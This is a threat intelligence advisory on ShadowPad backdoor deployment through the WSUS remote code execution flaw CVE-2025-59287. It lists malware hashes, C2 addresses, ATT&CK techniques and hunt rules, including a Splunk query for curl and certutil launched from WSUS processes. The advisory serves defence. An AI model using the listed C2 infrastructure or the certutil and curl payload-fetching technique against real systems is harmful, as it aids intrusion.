Rapid ShadowPad Deployment via WSUS Vulnerability
Targeted Sectors
· Manufacturing (heavily targeted, especially those in aviation and aerospace supply chains)
· Telecommunications
· Government
o Public Services
o Defense and Military
o Research Institutes (specifically a Taiwanese government-affiliated advanced computing research institute)
o Critical Infrastructure (government entities managing energy and power grids, such as the Indian State Load Despatch Centres (SLDCs))
o Municipal Government
o State Government
· Finance and Banking
· Energy (including critical infrastructure firms)
· Research and Education
· Healthcare and Pharmaceuticals
· Transportation
· Publishing
· Mining
· High-tech
Countries
· Global
BLUF
Threat actors aligned with Chinese state interests are exploiting a recently disclosed Remote Code Execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS) to gain system-level access and deploy the modular ShadowPad backdoor using DLL sideloading techniques for stealth.
Date of First Reported Activity
· December 8-9, 2025.
Date of Last Reported Activity Update
· December 9, 2025
Suspected APT groups
None have been specifically identified but the suspected groups are:
· APT41
o Also known by names such as Winnti, Barium, Wicked Panda, Bronze Atlas, and Earth Baku. This group is widely documented for its use of ShadowPad for both espionage and financially motivated operations.
· APT10 also known as MenuPass.
· APT23 Tonto Team.
· Earth Lusca also known as Aquatic Panda.
· PLA-affiliated Clusters: The attackers are generally linked to China's Ministry of State Security (MSS) and People's Liberation Army (PLA) intelligence apparatus.
Associated Criminal Organization Names
· None specified
Malware Names
· ShadowPad (modular backdoor)
· BURNBOOK
· MISTPEN (droppers/loaders)
Malware Sample
ShadowPad
sha256
e1bdb6a878dc5a81a74f7178259571d6c1c89fd8163185e6ccc61732d64b6338
URL to Sample
hxxps://www.virustotal.com/gui/file/e1bdb6a878dc5a81a74f7178259571d6c1c89fd8163185e6ccc61732d64b6338
Burnbook
sha256
d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
URL link to sha256
hxxps://www.virustotal.com/gui/file/d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
MistPen
sha256
47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
URL to sample link
hxxps://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
IOCs
C2 IP Addresses used in the WSUS campaign
· 149.28.78[.]189:42306
C2 Domains (older campaigns):
· dscriy.chtq[.]net
· cybaq.chtq[.]net
· Presence of certutil or curl execution used for downloading secondary payloads.
· Unauthorized DLL files used for sideloading the ShadowPad payload.
· Encrypted HTTP(S) and WebSocket communications to C2 infrastructure.
CVE-2025-59287
Microsoft Windows Server Update Services (WSUS) RCE vulnerability.
CVSS v3.1/4.0 Vectors
· (9.8) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nessus ID
· Windows Server 2012
o Plugin ID 271441
· 2012 R2
o Plugin ID 271435
· 2016
o Plugin ID 271439
· 2019
o Plugin ID 271437
· 2022
o Plugin ID 271438
· 2022 23H2
o Plugin ID 271436
· 2025
o Plugin ID 271440
TTPs
· T1190: Exploit Public-facing Application: Exploitation of CVE-2025-59287 in WSUS servers.
· T1059: Command and Scripting Interpreter: Use of PowerShell-based tools for initial compromise actions.
· T1574.002: Hijack Execution Flow: DLL Side-loading: Primary method for executing ShadowPad covertly using legitimate software.
· T1105: Ingress Tool Transfer: Use of legitimate utilities like certutil and curl to fetch malware from remote servers.
· T1071.001: Application Layer Protocol: Web Protocols: Use of HTTP(S) for C2 communications.
Suggested Rules / potential hunts
Suggested Suricata Rules
· Alert on certutil or curl processes on WSUS servers with command-line arguments containing external URLs or IP addresses.
· Detect anomalous outbound connections from WSUS server processes that do not match expected update traffic patterns.
Suggested Sentinel Rules
· Monitor for ProcessCreationEvents where ParentProcessName is related to WSUS and Image is powershell.exe, cmd.exe, curl.exe, or certutil.exe with network connection parameters.
· Look for deviations from normal DLL loading behavior on WSUS hosts.
Suggested Splunk Hunts
index=windows source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 "Image" IN ("*\\curl.exe", "*\\certutil.exe") | where ParentImage contains "wsus"
Hunt for network metadata showing outbound connections from WSUS server to unknown IP ranges.
Delivery Method
· Network exploitation of the vulnerable WSUS service, followed by file transfer of malware loaders
Email Samples
· Not applicable/available for this network exploitation method.
References
VirusTotal
· hxxps://www.virustotal.com/gui/file/e1bdb6a878dc5a81a74f7178259571d6c1c89fd8163185e6ccc61732d64b6338
· hxxps://www.virustotal.com/gui/file/d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f
· hxxps://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
AhnLab Security Intelligence Center (ASEC) Analysis
· hxxps://asec.ahnlab.com/en/91166/
The Hacker News
· hxxps://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
HIvepro
· hxxps://hivepro.com/threat-advisory/shadowpad-gatecrashes-the-enterprise-by-hijacking-wsus-vulnerability/
Petri IT
· hxxps://petri.com/wsus-rce-exploit-shadowpad-backdoor-attack/
NVD
· hxxps://nvd.nist.gov/vuln/detail/CVE-2025-59287
Microsoft
· hxxps://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287
CISA
· hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-59287
Patch Information
· hxxps://support.microsoft.com/en-us/topic/october-23-2025-kb5070882-os-build-14393-8524-out-of-band-3400c459-db78-48bc-ae69-f61bff15ea7c
